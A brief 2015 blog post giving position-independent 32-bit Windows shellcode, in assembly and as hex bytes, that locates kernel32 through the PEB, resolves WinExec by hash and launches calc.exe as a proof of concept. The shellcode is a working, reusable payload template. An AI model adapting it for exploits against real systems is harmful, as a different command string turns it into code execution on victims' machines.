WinExec calc.exe universal shellcode

Written by  on August 21, 2015 

ASM:

PUSH ESI ; LOCATE KERNEL32 BASE ADDR
XOR EAX,EAX
MOV EAX,DWORD PTR FS:[EAX+30]
MOV EAX,DWORD PTR DS:[EAX+C]
MOV ESI,DWORD PTR DS:[EAX+1C]
LODS DWORD PTR DS:[ESI]
MOV EAX,DWORD PTR DS:[EAX+8]
POP ESI
MOV EBP,EAX
MOV EBX,F4C07457 ; HASH FOR WINEXEC
XOR ECX,ECX ; RESOLVE WINEXEC FUNCTION ADDR
MOV EDI,DWORD PTR SS:[EBP+3C]
MOV EDI,DWORD PTR SS:[EBP+EDI+78]
ADD EDI,EBP
next_function_pointer: ;SET A LABEL HERE
MOV EDX,DWORD PTR DS:[EDI+20]
ADD EDX,EBP
MOV ESI,DWORD PTR DS:[EDX+ECX*4]
ADD ESI,EBP
XOR EAX,EAX
CDQ
hash_next_byte: ;SET A LABEL HERE
LODS BYTE PTR DS:[ESI]
ROR EDX,0D
ADD EDX,EAX
TEST AL,AL
JNZ SHORT hash_next_byte
INC ECX
CMP EDX,EBX
JNZ SHORT next_function_pointer
DEC ECX
MOV EBX,DWORD PTR DS:[EDI+24]
ADD EBX,EBP
MOV CX,WORD PTR DS:[EBX+ECX*2]
MOV EBX,DWORD PTR DS:[EDI+1C]
ADD EBX,EBP
MOV EAX,DWORD PTR DS:[EBX+ECX*4]
ADD EAX,EBP
MOV EBX,11111111 ; PUSH CALC.EXE, VISIBLE AND CALL FUNCTION
XOR EBX,11111111
PUSH EBX
PUSH 6578652E
PUSH 636C6163
MOV EDI,ESP
PUSH EDI
PUSH EDI
CALL EAX

 

HEX:

\x56\x33\xC0\x64\x8B\x40\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40
\x08\x5E\x8B\xE8\xBB\x57\x74\xC0\xF4\x33\xC9\x8B\x7D\x3C\x8B\x7C
\x3D\x78\x03\xFD\x8B\x57\x20\x03\xD5\x8B\x34\x8A\x03\xF5\x33\xC0
\x99\xAC\xC1\xCA\x0D\x03\xD0\x84\xC0\x75\xF6\x41\x3B\xD3\x75\xE4
\x49\x8B\x5F\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5F\x1C\x03\xDD\x8B
\x04\x8B\x03\xC5\xBB\x11\x11\x11\x11\x81\xF3\x11\x11\x11\x11\x53
\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xFC\x57\x57\x90\xFF
\xD0

 

calc

 

Soon I’ll be releasing a complete post about shellcode writing

P-)

Category : 420blazeit

Leave a Reply

Your email address will not be published. Required fields are marked *